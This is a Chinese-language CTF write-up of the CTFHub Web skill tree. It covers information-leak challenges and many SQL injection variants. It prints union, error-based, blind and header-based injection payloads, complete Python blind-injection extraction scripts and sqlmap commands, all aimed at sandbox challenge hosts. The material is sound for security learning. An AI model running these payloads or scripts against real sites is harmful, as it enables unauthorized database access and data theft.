银河以北,吾彦最美
银河以北,吾彦最美

CTFHub——Web技能树

文章目录

  • 信息泄露
    • 目录遍历
    • PHPINFO
    • 备份文件下载
    • Git泄露
    • SVN泄露
    • HG泄露
  • SQL注入
    • 整型注入
    • 字符型注入
    • 报错注入
    • 布尔盲注
    • 时间盲注
    • MySQL结构
    • cookie注入
    • UA注入
    • Refer注入
    • 过滤空格

网上收集的资料,本地上传,原文链接丢失,只是整理了一下,记录一下自己的做题过程,后续的会附上原文链接

信息泄露

目录遍历

CTFHub——Web技能树_第1张图片
用python脚本找一下flag.txt的路径

import requests

url = "http://challenge-9360ebe6745e6c45.sandbox.ctfhub.com:10080/flag_in_here/"

for i in range(5):
    for j in range(5):
        url_test =url+"/"+str(i)+"/"+str(j)
        r = requests.get(url_test)
        r.encoding = 'utf-8'
        get_file=r.text
        if "flag.txt" in get_file:
            print(url_test)

在这里插入图片描述
找到flag的目录在/2/1,跟着这个目录找到flag

CTFHub——Web技能树_第2张图片
在这里插入图片描述

PHPINFO

直接ctrl+f,搜索flag即可
CTFHub——Web技能树_第3张图片

备份文件下载

1)网站源码
CTFHub——Web技能树_第4张图片
根据提示,将该列表制作成字典,抓包,利用bp的intruder模块,添加变量,利用bp去爆破一下真正的备份文件名
CTFHub——Web技能树_第5张图片找到长度与其他不一样的,得到我们的备份文件名 www.zip
CTFHub——Web技能树_第6张图片
从网站上下载下来,解压,发现flag文件里不是真正的flag
在这里插入图片描述
在url里访问一下
在这里插入图片描述
2)bak文件

​ 提示flag在index.php中,结合题目是bak文件,猜测访问一下index.php.bak
CTFHub——Web技能树_第7张图片
果真存在这个文件,下载下来,flag就在里面
CTFHub——Web技能树_第8张图片
3)vim缓存
CTFHub——Web技能树_第9张图片
这里要知道什么是vim

  ​  在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓      存文件恢复原始文件内容

  ​  以 index.php 为例:第一次产生的交换文件名为 .index.php.swp
  ​  再次意外退出后,将会产生名为 .index.php.swo 的交换文件
  ​  第三次产生的交换文件则为 .index.php.swn

网页提示我们flag在index.php的源码中,我们顺着这个思路去浏览文件,但是注意swp这类隐藏文件在调用时前面要加一个 ‘ . ’

CTFHub——Web技能树_第10张图片在这里插入图片描述
4).DS_Store

​ 根据题意下载.DS_Store
CTFHub——Web技能树_第11张图片

下面几个看朋友用的一个工具,我装了有点问题,不是很好用,等弄好了再补

Git泄露

SVN泄露

HG泄露

SQL注入

整型注入

题目都说了是整型注入,省去判断类型,直接使用 **1order by 1,2…… ** 来猜一下执行我们sql查询的表有几个字段
执行到 order by 3 的时候报错了,说明查询的表有2个字段
CTFHub——Web技能树_第12张图片

此时要先保证之前的数据查不出来,之后再union 。id=-1数据不存在数据库中。使用语句 -1 union select 1,2 可以看到位置2可以插入SQL语句
CTFHub——Web技能树_第13张图片

获取数据库名称 -1 union select 1,database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sObI4nuc-1611368489311)(C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210105140140524.png)]

获取数据库中表的名称,测试的时候发现只会回显一行数据,所以使用group_concat将查询结果连接起来

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli’
CTFHub——Web技能树_第14张图片
获取表的字段名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag’
CTFHub——Web技能树_第15张图片
看到flag字段

CTFHub——Web技能树_第16张图片
查询flag字段里的值
-1 union select flag,2 from flag
CTFHub——Web技能树_第17张图片

字符型注入

字符型注入主要注意闭合后面的引号,可以用 “- -” 和“#”来注释掉后面的’ ’ ‘
CTFHub——Web技能树_第18张图片

1’ order by 1,2……–

先猜执行我们sql查询的表有几个字段,执行到3的时候报错,说明是2个字段

CTFHub——Web技能树_第19张图片
接下来跟整型差不多
查数据库 -1’ union select database(),2–
CTFHub——Web技能树_第20张图片
查表 -1’ union select group_concat(table_name),2 from information_schema.tables where table_schema=‘sqli’–

CTFHub——Web技能树_第21张图片
查字段名 -1’ union select group_concat(column_name),2 from information_schema.columns where table_name=‘flag’–
CTFHub——Web技能树_第22张图片
查flag字段里的值 -1’ union select flag,2 from flag–
CTFHub——Web技能树_第23张图片

报错注入

当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误,那么就存在报错注入的可能性。

报错注入的原理在于三个函数:count(*),rand(),floor()以及group by

1.floor()函数是用来向下取整呢个的,相当于去掉小数部分
2.rand()是随机取(0,1)中的一个数,但是给它一个参数后0,即rand(0),并且传如floor()后,
即:floor(rand(0)*2)它就不再是随机了,序列0110110

CTFHub——Web技能树_第24张图片

select count(*),(concat(database(),0x26,(floor(rand(0)*2))x from users group by x;

报错的时候会把数据库名给爆出来,使用时将database()修改一下即可

在这里插入图片描述
x就是相当于 as x,设一个别名
原理:group by 查询时,先建立一个空表,用来临时存储数据,
开始查询,group by x,序列一开始为0,临时空表里不存在就填入,之后 select 中也有rand(),值为1,插入1;
查询第二条,值为1,原有值加1
查第三条,值为0,则插入select的值,为1,与原有值冲突报错。

看题看一下操作结果:

查询数据库

1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

CTFHub——Web技能树_第25张图片

0x26=&,为了区分,得到数据库名sqli,和之前几题一样

查询数据库中的表,由于查询结果不止一个,我一开始打算使用group_concat()函数来连接,但是失败了改用limit

1 union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

CTFHub——Web技能树_第26张图片

CTFHub——Web技能树_第27张图片

查flag表里的字段

1 union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

CTFHub——Web技能树_第28张图片

查询flag字段里的值

1 union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
在这里插入图片描述

布尔盲注

布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注要盲猜试错。由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错。
CTFHub——Web技能树_第29张图片

一、盲注思路

由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下:

  1. 爆库名长度
  2. 根据库名长度爆库名
  3. 对当前库爆表数量
  4. 根据库名和表数量爆表名长度
  5. 根据表名长度爆表名
  6. 对表爆列数量
  7. 根据表名和列数量爆列名长度
  8. 根据列名长度爆列名
  9. 根据列名爆数据值

二、盲注原理

将自己的注入语句使用and?id=1并列,完成注入
在这里插入图片描述

Ⅰ、盲注常用函数

  1. substr(str,from,length):返回从下标为from截取长度为length的str子串。其中,首字符下标为1
  2. length(str):返回str串长度

Ⅱ、盲注步骤

穷举、盲猜

  1. 爆数据库名长度
    首先,通过循环i从1到无穷,使用length(database()) = i获取库名长度,i是长度,直到返回页面提示query_success即猜测成功
?id=1 and length(database())=1
#query_error
...
?id=1 and length(database())=4
#query_success
#库名长度为4
  1. 根据库名长度爆库名
    获得库名长度i后,使用substr(database(),i,1)将库名切片,循环i次,i是字符下标,每次循环要遍历字母表[a-z]作比较,即依次猜每位字符

注意观察substr(database,i,1)
i从1开始(第i个字符)

?id=1 and substr(database(),1,1)=‘a’
#query_error
...
?id=1 and substr(database(),1,1)=‘s’
#query_success
#库名第一个字符是s
...
?id=1 and substr(database(),4,1)=‘i’
#query_success
#库名第四个字符是i

#库名是sqli
  1. 对当前库爆表数量
    下一步是获取数据库内的表数量,使用mysql的查询语句select COUNT(*)。同样,要一个1到无穷的循环
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=1
#query_error

?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=2
#query_success
#当前库sqli有2张表
  1. 根据库名和表数量爆表名长度
    得到表数量i后,i就是循环次数,i是表的下标-1,大循环i次(遍历所有表),这里的i从0开始,使用limit i ,1限定是第几张表,内嵌循环j从1到无穷(穷举所有表名长度可能性)尝试获取每个表的表名长度

注意观察limit i,1
i从0开始(第i+1张表)

?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=1
#query_error
...
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=4
#query_success
#当前库sqli的第一张表表名长度为4
...
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 1,1)=4
#query_success
#当前库sqli的第二张表表名长度为4

#当前库sqli有两张表’news’和’flag‘,表名长度均为4
  1. 根据表名长度爆表名
    再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名

注意观察substr((select…limit i,1),j,1)
i从0开始(第i+1张表),j从1开始(第j个字符)

?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’
#query_error
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘n’
#query_success
#当前库sqli的第一张表表名第一个字符是n
...
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1)=‘g’
#query_success
#当前库sqli的第二张表表名的第四个字符是g

#当前库sqli有两张表’news‘和‘flag’

这里分析一下表名——flag在第二张表flag里面,就不用对表news操作了

  1. 对表爆列数量
    操作同对当前库爆表数量的步骤,只是要查询的表不同
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=1
#query_error

?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=2
#query_success
#当前库sqli表flag的列数为2
  1. 根据表名和列数量爆列名长度
    操作同对当前库爆表名长度的步骤,i是列标-1

注意观察limit i,1
i从0开始(第i+1列)

?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=1
#query_error
...
?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=2
#query_success
#当前库sqli表flag的第一列列名长度为2
...
?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=4
#query_success
#当前库sqli表flag的第二列列名长度为4

#当前库sqli表flag有两个列‘id’和‘flag’,列名长度为2和4
  1. 根据列名长度爆列名
    操作同对当前库爆表名的步骤,i是列标-1,j是字符下标

注意观察substr((select…limit i,1),j,1))
i从0开始(第i+1列),j从1开始(第j个字符)

?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘a’
#query_error
...
?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘i’
#query_success
#当前库sqli表flag的第一列列名第一个字符为i
...
?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 1,1),4,1)=‘g’
#query_success
#当前库sqli表flag的第二列列名第四个字符为g

#当前库sqli表flag有两个列‘id’和‘flag’
  1. 根据列名爆数据
    flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束

注意观察substr((select…),j,1)
j从1开始(flag的第j个字符)

?id=1 and substr((select flag from sqli.flag),11)=“a”
#query_error
...
?id=1 and substr((select flag from sqli.flag),11)=“c”
#query_success
#flag的第一个字符是c
...
?id=1 and substr((select flag from sqli.flag),i,1)=}#query_success
#flag的最后一个字符是}
#这里的j是计数变量j从1自增1得到的值

#出循环即可得到flag

三、脚本自动化盲注

Python脚本

由于布尔盲注有大量重复的操作,手注极其繁琐且枯燥,这里给出使用Python编写的脚本完成布尔盲注

脚本使用requests库完成GET请求,基于Python3

#导入库
import requests

#设定环境URL,由于每次开启环境得到的URL都不同,需要修改!
url = 'http://challenge-9e60bb79512ae37b.sandbox.ctfhub.com:10080/'
#作为盲注成功的标记,成功页面会显示query_success
success_mark = "query_success"
#把字母表转化成ascii码的列表,方便便利,需要时再把ascii码通过chr(int)转化成字母
ascii_range = range(ord('a'),1+ord('z'))
#flag的字符范围列表,包括花括号、a-z,数字0-9
str_range = [123,125] + list(ascii_range) + list(range(48,58))

#自定义函数获取数据库名长度
def getLengthofDatabase():
	#初始化库名长度为1
    i = 1
    #i从1开始,无限循环库名长度
    while True:
        new_url = url + "?id=1 and length(database())={}".format(i)
        #GET请求
        r = requests.get(new_url)
        #如果返回的页面有query_success,即盲猜成功即跳出无限循环
        if success_mark in r.text:
        	#返回最终库名长度
            return i
        #如果没有匹配成功,库名长度+1接着循环
        i = i + 1

#自定义函数获取数据库名
def getDatabase(length_of_database):
	#定义存储库名的变量
    name = ""
    #库名有多长就循环多少次
    for i in range(length_of_database):
    	#切片,对每一个字符位遍历字母表
    	#i+1是库名的第i+1个字符下标,j是字符取值a-z
        for j in ascii_range:
            new_url = url + "?id=1 and substr(database(),{},1)='{}'".format(i+1,chr(j))
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到库名变量里
                name += chr(j)
                #当前下标字符匹配成功,退出遍历,对下一个下标进行遍历字母表
                break
    #返回最终的库名
    return name

#自定义函数获取指定库的表数量
def getCountofTables(database):
	#初始化表数量为1
    i = 1
    #i从1开始,无限循环
    while True:
        new_url = url + "?id=1 and (select count(*) from information_schema.tables where table_schema='{}')={}".format(database,i)
        r = requests.get(new_url)
        if success_mark in r.text:
        	#返回最终表数量
            return i
        #如果没有匹配成功,表数量+1接着循环
        i = i + 1

#自定义函数获取指定库所有表的表名长度
def getLengthListofTables(database,count_of_tables):
	#定义存储表名长度的列表
	#使用列表是考虑表数量不为1,多张表的情况
    length_list=[]
    #有多少张表就循环多少次
    for i in range(count_of_tables):
    	#j从1开始,无限循环表名长度
        j = 1
        while True:
        	#i+1是第i+1张表
            new_url = url + "?id=1 and length((select table_name from information_schema.tables where table_schema='{}' limit {},1))={}".format(database,i,j)
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到表名长度的列表
                length_list.append(j)
                break
            #如果没有匹配成功,表名长度+1接着循环
            j = j + 1
    #返回最终的表名长度的列表
    return length_list

#自定义函数获取指定库所有表的表名
def getTables(database,count_of_tables,length_list):
    #定义存储表名的列表
    tables=[]
    #表数量有多少就循环多少次
    for i in range(count_of_tables):
    	#定义存储表名的变量
        name = ""
        #表名有多长就循环多少次
        #表长度和表序号(i)一一对应
        for j in range(length_list[i]):
        	#k是字符取值a-z
            for k in ascii_range:
                new_url = url + "?id=1 and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)='{}'".format(database,i,j+1,chr(k))
                r = requests.get(new_url)
                if success_mark in r.text:
                	#匹配到就加到表名变量里
                    name = name + chr(k)
                    break
        #添加表名到表名列表里
        tables.append(name)
    #返回最终的表名列表
    return tables

#自定义函数获取指定表的列数量
def getCountofColumns(table):
	#初始化列数量为1
    i = 1
    #i从1开始,无限循环
    while True:
        new_url = url + "?id=1 and (select count(*) from information_schema.columns where table_name='{}')={}".format(table,i)
        r = requests.get(new_url)
        if success_mark in r.text:
        	#返回最终列数量
            return i
        #如果没有匹配成功,列数量+1接着循环
        i = i + 1

#自定义函数获取指定库指定表的所有列的列名长度
def getLengthListofColumns(database,table,count_of_column):
	#定义存储列名长度的变量
	#使用列表是考虑列数量不为1,多个列的情况
    length_list=[]
    #有多少列就循环多少次
    for i in range(count_of_column):
        #j从1开始,无限循环列名长度
        j = 1
        while True:
            new_url = url + "?id=1 and length((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1))={}".format(database,table,i,j)
            r = requests.get(new_url)
            if success_mark in r.text:
            	#匹配到就加到列名长度的列表
                length_list.append(j)
                break
            #如果没有匹配成功,列名长度+1接着循环
            j = j + 1
    #返回最终的列名长度的列表
    return length_list

#自定义函数获取指定库指定表的所有列名
def getColumns(database,table,count_of_columns,length_list):
	#定义存储列名的列表
    columns = []
    #列数量有多少就循环多少次
    for i in range(count_of_columns):
        #定义存储列名的变量
        name = ""
        #列名有多长就循环多少次
        #列长度和列序号(i)一一对应
        for j in range(length_list[i]):
            for k in ascii_range:
                new_url = url + "?id=1 and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'".format(database,table,i,j+1,chr(k))
                r = requests.get(new_url)
                if success_mark in r.text:
                	#匹配到就加到列名变量里
                    name = name + chr(k)
                    break
        #添加列名到列名列表里
        columns.append(name)
    #返回最终的列名列表
    return columns

#对指定库指定表指定列爆数据(flag)
def getData(database,table,column,str_list):
	#初始化flag长度为1
    j = 1
    #j从1开始,无限循环flag长度
    while True:
    	#flag中每一个字符的所有可能取值
        for i in str_list:
            new_url = url + "?id=1 and substr((select {} from {}.{}),{},1)='{}'".format(column,database,table,j,chr(i))
            r = requests.get(new_url)
            #如果返回的页面有query_success,即盲猜成功,跳过余下的for循环
            if success_mark in r.text:
            	#显示flag
                print(chr(i),end="")
                #flag的终止条件,即flag的尾端右花括号
                if chr(i) == "}":
                    print()
                    return 1
                break
        #如果没有匹配成功,flag长度+1接着循环
        j = j + 1

#--主函数--
if __name__ == '__main__':
	#爆flag的操作
	#还有仿sqlmap的UI美化
    print("Judging the number of tables in the database...")
    database = getDatabase(getLengthofDatabase())
    count_of_tables = getCountofTables(database)
    print("[+]There are {} tables in this database".format(count_of_tables))
    print()
    print("Getting the table name...")
    length_list_of_tables = getLengthListofTables(database,count_of_tables)
    tables = getTables(database,count_of_tables,length_list_of_tables)
    for i in tables:
        print("[+]{}".format(i))
    print("The table names in this database are : {}".format(tables))

	#选择所要查询的表
    i = input("Select the table name:")

    if i not in tables:
        print("Error!")
        exit()

    print()
    print("Getting the column names in the {} table......".format(i))
    count_of_columns = getCountofColumns(i)
    print("[+]There are {} tables in the {} table".format(count_of_columns,i))
    length_list_of_columns = getLengthListofColumns(database,i,count_of_columns)
    columns = getColumns(database,i,count_of_columns,length_list_of_columns)
    print("[+]The column(s) name in {} table is:{}".format(i,columns))

	#选择所要查询的列
    j = input("Select the column name:")

    if j not in columns:
        print("Error!")
        exit()

    print()
    print("Getting the flag......")
    print("[+]The flag is ",end="")
    getData(database,i,j,str_range)

此脚本只针对于本题,可能与其他题目不兼容
由于没有输入检测,输入没有flag的表和列,可能导致运行错误
由于盲猜是依次遍历,可以优化使用random函数或者是二分法改进算法
在这里插入图片描述

时间盲注

1. 题目信息
在这里插入图片描述
2. 页面3秒钟后才响应,说明数据库名称长度=4

1 and if(length(database())=4,sleep(3),1)
1

在这里插入图片描述

猜解数据库名称

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)	ascii(l)=108

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	ascii(i)=105

......
不断调整ASCII码的范围逐渐得到数据库名称为sqli

在这里插入图片描述
在这里插入图片描述

sqli数据库中表的数量

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1)
12

页面3秒后响应,说明有两张表
在这里插入图片描述

猜解表名

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
  ascii(n)=110

3秒后响应,说明第一张表的第一个字母为n
依次得到表名为news

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
  ascii(f)=102

3秒后响应,说明第一张表的第一个字母为f
依次得到表名为flag

猜解flag表的字段数

1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

3秒后响应,只有一个字段
在这里插入图片描述

猜解字段名

1 and if(ascii(substr((select column_name from information_schema.columns
 where table_name='flag'),1,1))=102,sleep(3),1)

一样的套路,得到字段名为flag

跟布尔盲注差不多,只不过将判断条件改成了是否有时间停顿

python脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
import time

session=requests.session()
url = "http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id="
name = ""

# for k in range(1,10):
#      for i in range(1,10):
#          print(i)
#          for j in range(31,128):
#              j = (128+31) -j
#              str_ascii=chr(j)
#              #数据库名
#              #payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))
#              #表名
#              #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))
#              #字段名
#              payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
#              start_time=time.time()
#              str_get = session.get(url=url + payolad)
#              end_time = time.time()
#              t = end_time - start_time
#              if t > 1:
#                  if str_ascii == "+":
#                      sys.exit()
#                  else:
#                      name+=str_ascii
#                      break
#          print(name)

# #查询字段内容
for i in range(1,50):
    print(i)
    for j in range(31,128):
         j = (128+31) -j
         str_ascii=chr(j)
         payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)
         start_time = time.time()
         str_get = session.get(url=url + payolad)
         end_time = time.time()
         t = end_time - start_time
         if t > 1:
             if str_ascii == "+":
                 sys.exit()
             else:
                 name += str_ascii
                 break
    print(name)

CTFHub——Web技能树_第30张图片

利用sqlmap

感觉手工注入太麻烦了,就换用了sqlmap,sqlmap真香

爆库

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 --dbs

在这里插入图片描述
爆表

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

在这里插入图片描述
爆字段

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

在这里插入图片描述
爆字段的值

sqlmap -u http://challenge-6ad5f24c1d7a4906.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

在这里插入图片描述

MySQL结构

首先输入1,看看情况,发现是整型注入
CTFHub——Web技能树_第31张图片
之后跟整型注入一样,不手工了直接上sqlmap

爆库

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 --dbs

在这里插入图片描述
爆表

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

在这里插入图片描述
爆字段

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli -T zijdmwuykd --columns

在这里插入图片描述
爆字段值

sqlmap -u http://challenge-c003ba24b6357ae2.sandbox.ctfhub.com:10080/?id=1 -D sqli -T zijdmwuykd --columns --dump

在这里插入图片描述

cookie注入

  • CTFHub——Web技能树_第32张图片
    提示cookie注入,在cookie这边尝试一下,是整型的cookie注入

CTFHub——Web技能树_第33张图片
手工注入

接下里就是看一下查询语句的字段,字段为2

CTFHub——Web技能树_第34张图片
查数据库名称,sqli
CTFHub——Web技能树_第35张图片
查询数据库里的表,vqmwpxegjy和news
CTFHub——Web技能树_第36张图片

查表里的字段 ,awgacgkdkc
CTFHub——Web技能树_第37张图片

查字段里的值
CTFHub——Web技能树_第38张图片 sqlmap
爆库

sqlmap -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

CTFHub——Web技能树_第39张图片
爆表

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli --tables

CTFHub——Web技能树_第40张图片
爆字段

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli -T vqmwpxegjy --columns

在这里插入图片描述
爆字段里的值

sqlmap -u http://challenge-f2e2a7ea1a5d3444.sandbox.ctfhub.com:10080/ --cookie "id=1" --level 2 -D sqli -T vqmwpxegjy --columns --dump

在这里插入图片描述

UA注入

CTFHub——Web技能树_第41张图片
根据提示,bp抓包看一下user-agent在哪儿
CTFHub——Web技能树_第42张图片
点击action发送到repeater模块,然后就跟普通的整型注入一样

  1. 猜测查询语句字段,执行到 1 order by 3 的时候页面不会显了,说明字段是2
    CTFHub——Web技能树_第43张图片CTFHub——Web技能树_第44张图片
  2. -1 union select 1,2 查看注入回显点,回显点在data:
    CTFHub——Web技能树_第45张图片
  3. 查数据库名,
    -1 union select 1,database()
    查的数据库名是sqli
    CTFHub——Web技能树_第46张图片
  4. 查数据库中的表名
    -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
    查的两张表zipqdgmgclnews
    CTFHub——Web技能树_第47张图片
  5. 查字段名
    -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='zipqdgmgcl'
    得到字段dmbkyxkflb
    CTFHub——Web技能树_第48张图片
  6. 查字段里的值,得到flag,这边 sqli.zipqdgmgcl也可以直接写zipqdgmgcl
    -1 union select 1,group_concat(dmbkyxkflb) from sqli.zipqdgmgcl
    CTFHub——Web技能树_第49张图片
    sqlmap
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 --dbs
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 -D sqli --tables
sqlmap -u http://challenge-0db4dfe24728939b.sandbox.ctfhub.com:10080/  --level 3 -D sqli -T ztoczxhmwd --columns --dump

Refer注入

CTFHub——Web技能树_第50张图片
提示在referer中输入id,但是我一开始直接抓包没有看到referer这个参数,首先要用hackbar来传参id=1,然后抓包就能看到referer这个参数了
CTFHub——Web技能树_第51张图片
CTFHub——Web技能树_第52张图片
发送到repeater,更改Referer后面的参数,注入点在这边,后面的跟整型注入一样
猜查询语句的字段数
执行到1 order by 3 看不见回显,说明查询语句字段是2
CTFHub——Web技能树_第53张图片
CTFHub——Web技能树_第54张图片
查注入回显点
-1 union select 1,2
CTFHub——Web技能树_第55张图片
查数据库名称,sqli
-1 union select 1,database()
CTFHub——Web技能树_第56张图片
查数据库里的表,cghhcnpxfwnews
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
CTFHub——Web技能树_第57张图片
cghhcnpxfw表里的字段
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cghhcnpxfw'
CTFHub——Web技能树_第58张图片
tfowunhewj字段的值
-1 union select 1,tfowunhewj from cghhcnpxfw
CTFHub——Web技能树_第59张图片
sqlmap(速度较慢,耐心等待)
方法一

sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 --dbs
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz --columns
sqlmap -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump

方法二
尝试注入,成功返回结果

将如下内容保存到sqlmap根目录下

POST / HTTP/1.1
Host: challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
Connection: close
Referer: 1
Upgrade-Insecure-Requests: 1

使用如下命令查询(referer.txt是保存在sqlmap根目录下的文件名,或者其他路径)

sqlmap -r referer.txt --level 5 --dbs
sqlmap -r referer.txt --level 5 -D sqli --tables
sqlmap -r referer.txt --level 5 -D sqli -T mpiqfobzkz --columns
sqlmap -r referer.txt --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump

CTFHub——Web技能树_第60张图片

过滤空格

题目过滤了空格,输入空格会出现hacker!!!字样
在这里插入图片描述
尝试使用特殊字符代替空格,试了好多,最后看/**/可以,只要将原先的空格替换成/**/就可以了,其他的跟整型注入一样

  1. 猜查询语句字段
    1/**/order/**/by/**/3
    CTFHub——Web技能树_第61张图片

  2. 查看注入回显点
    -1/**/union/**/select/**/1,2
    CTFHub——Web技能树_第62张图片

  3. 查数据库名称
    -1/**/union/**/select/**/1,database()
    CTFHub——Web技能树_第63张图片

  4. 查数据库里的表
    -1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
    在这里插入图片描述

  5. rohzmfodat表里的字段
    -1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='rohzmfodat'
    CTFHub——Web技能树_第64张图片

  6. 查jeqtzbgwoo字段的值
    -1/**/union/**/select/**/1,jeqtzbgwoo/**/from/**/rohzmfodat
    CTFHub——Web技能树_第65张图片
    ctfhub上有的sql注入做完了,更新了在补。其他模块后面慢慢整理。

你可能感兴趣的:(CTFHub)

  • CTFHub技能树web——XSS——DOM反射 A 八方 CTFhub技能树——Webxss前端
